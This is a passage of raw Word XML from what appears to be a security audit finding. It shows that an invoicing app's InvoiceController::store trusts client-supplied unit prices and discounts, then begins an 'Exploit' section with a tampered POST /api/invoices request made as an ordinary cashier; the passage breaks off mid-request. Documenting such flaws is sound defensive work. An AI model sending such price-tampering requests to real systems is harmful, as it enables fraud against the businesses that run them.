              <v:group w14:anchorId="1ADC2BE8" id="Group 26039" o:spid="_x0000_s1174" style="width:510.25pt;height:84pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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&#10;">
                <v:shape id="Shape 980" o:spid="_x0000_s1175" style="position:absolute;top:2571;width:64801;height:5430;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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oDdwQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9NawIx&#10;EL0X+h/CFLyUmtVD0dUopbLitatCvQ2bcbO4mYQk6vrvm0PB4+N9L9eD7cWNQuwcK5iMCxDEjdMd&#10;twoO++pjBiImZI29Y1LwoAjr1evLEkvt7vxDtzq1IodwLFGBScmXUsbGkMU4dp44c2cXLKYMQyt1&#10;wHsOt72cFsWntNhxbjDo6dtQc6mvVsH5vXqYzclXcbvb1r/GTw6ncFRq9DZ8LUAkGtJT/O/eaQXz&#10;WZ6fz+QjIFd/AAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhADRegN3BAAAA3AAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1451l6480126,5034r,532856l6474764,541468v-2334,967,-4763,1457,-7290,1457l19050,542925v-2526,,-4956,-490,-7290,-1457c9426,540507,7366,539130,5580,537344,3793,535558,2417,533493,1450,531161l,523875,,19050,1450,11757c2417,9426,3793,7367,5580,5581,7366,3795,9426,2418,11760,1451,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,542925"/>
                </v:shape>
                <v:rect id="Rectangle 991" o:spid="_x0000_s1176" style="position:absolute;top:88;width:736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6C249D2" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t>Evidence.</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 992" o:spid="_x0000_s1177" style="position:absolute;left:5542;top:88;width:438;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3696BB55" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 993" o:spid="_x0000_s1178" style="position:absolute;left:5905;width:14478;height:1333;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="14478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YNQxQAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/basMw&#10;EETfA/kHsYW8JbJbyMWJEtxCwXkp5PIBi7WxTa2VY6m+5OujQqGPw+yc2dkdBlOLjlpXWVYQLyIQ&#10;xLnVFRcKrpfP+RqE88gaa8ukYCQHh/10ssNE255P1J19IQKEXYIKSu+bREqXl2TQLWxDHLybbQ36&#10;INtC6hb7ADe1fI2ipTRYcWgosaGPkvLv848Jb9z1e7yOGzOu+oyWqbsc+6+HUrOXId2C8DT4/+O/&#10;dKYVbDZv8DsmEEDunwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAA&#10;AAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAAL&#10;AAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDKfYNQxQAAANwAAAAP&#10;AAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA+QIAAAAA&#10;" path="m9525,l1438275,v2630,,4875,930,6735,2791c1446870,4651,1447800,6902,1447800,9525r,114300c1447800,126454,1446870,128699,1445010,130559v-1860,1861,-4105,2791,-6735,2791l9525,133350v-2630,,-4875,-930,-6735,-2791c930,128699,,126454,,123825l,9525c,6902,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1447800,133350"/>
                </v:shape>
                <v:rect id="Rectangle 994" o:spid="_x0000_s1179" style="position:absolute;left:6142;top:236;width:1860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4F9D6EA4" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>InvoiceController</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>::</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>store</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 995" o:spid="_x0000_s1180" style="position:absolute;left:20401;top:88;width:2945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65AA5D59" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> took the unit price straight off the request:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25502" o:spid="_x0000_s1181" style="position:absolute;left:1007;top:4026;width:217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29fxgAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPGFvmlpw0WoU8Q96dFVQb4/m2Rabl9JE291PbxYW9jjMzG+Y2aI1pXhR7QrLCoaDCARx&#10;anXBmYLzadsfg3AeWWNpmRR8k4PFvNuZYaJtw1/0OvpMBAi7BBXk3leJlC7NyaAb2Io4eHdbG/RB&#10;1pnUNTYBbkoZR9GnNFhwWMixolVO6eP4NAp242p53dufJis3t93lcJmsTxOv1EevXU5BeGr9f/iv&#10;vdcK4tEoiuH3TrgCcv4GAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA39NvX8YAAADeAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="53CBFC04" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>:62</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25504" o:spid="_x0000_s1182" style="position:absolute;left:2641;top:4026;width:3621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KwxgAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPMGbpiuraDWK6Ioe/bPg7u3RPNuyzUtpoq1+eiMIexxm5jfMbNGYQtyocrllBR/9CARx&#10;YnXOqYLv06Y3BuE8ssbCMim4k4PFvN2aYaxtzQe6HX0qAoRdjAoy78tYSpdkZND1bUkcvIutDPog&#10;q1TqCusAN4UcRNFIGsw5LGRY0iqj5O94NQq243L5s7OPOi2+frfn/XmyPk28Ut1Os5yC8NT4//C7&#10;vdMKBsNh9AmvO+EKyPkTAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAA&#10;AAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAA&#10;CwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAP3ZSsMYAAADeAAAA&#10;DwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPoCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="539019BE" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   $</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>sellingPrice</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> = (float) $item['</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>selling_price</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>'];</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25505" o:spid="_x0000_s1183" style="position:absolute;left:1007;top:5741;width:217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crxwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvgv9heUJvujGQotE1BFuJx1YL1tsj+5qEZt+G7GrS/vpuodDjMDPfMNtsNK24U+8aywqWiwgE&#10;cWl1w5WCt/NhvgLhPLLG1jIp+CIH2W462WKq7cCvdD/5SgQIuxQV1N53qZSurMmgW9iOOHgftjfo&#10;g+wrqXscAty0Mo6iR2mw4bBQY0f7msrP080oKFZd/n6030PVPl+Ly8tl/XRee6UeZmO+AeFp9P/h&#10;v/ZRK4iTJErg9064AnL3AwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFA69yvHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5A386444" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>:63</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25506" o:spid="_x0000_s1184" style="position:absolute;left:2641;top:5741;width:3766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lc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4jhL4vxOugFz9AQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAKDoaVzHAAAA3gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="406B612A" w14:textId="77777777" w:rsidR="001244A6" w:rsidRDefault="001244A6" w:rsidP="001244A6">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve">   $discount     = (float) ($item['discount'</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 xml:space="preserve"> 0);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 1003" o:spid="_x0000_s1185" style="position:absolute;left:45243;top:9334;width:4001;height:1334;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4000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JwgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f+D+EE/Y2kyrIrMYiguhgMOYEX8/mbIvNpTax7f77ZTDY2318P2+VDbYWHbW+cqwhmSgQxLkz&#10;FRcaTl+7l1cQPiAbrB2Thm/ykK1HTytMjev5k7pjKEQMYZ+ihjKEJpXS5yVZ9BPXEEfu6lqLIcK2&#10;kKbFPobbWk6VmkuLFceGEhvalpTfjg+r4fKe3O+LM86D/ZhKLGTf7d96rZ/Hw2YJItAQ/sV/7oOJ&#10;85Wawe838QS5/gEAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCN/IRJwgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l390525,v2630,,4876,930,6735,2791c399120,4651,400050,6896,400050,9525r,114300c400050,126454,399120,128693,397260,130553v-1859,1861,-4105,2791,-6735,2797l9525,133350v-2630,-6,-4875,-936,-6735,-2797c930,128693,,126454,,123825l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,400050,133350"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> compute the totals itself and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>did</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> force </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inv_by</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> from the token. But computing a correct total from attacker-supplied line prices is not server-side control it just launders the attacker's numbers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E3DD18" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="326"/>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Exploit.</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> As an ordinary cashier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA5CC6B" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>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POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/invoices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9FF185" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="67" w:line="265" w:lineRule="auto"/>
        <w:ind w:left="182"/>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 xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>items[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>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selling</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>_price</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
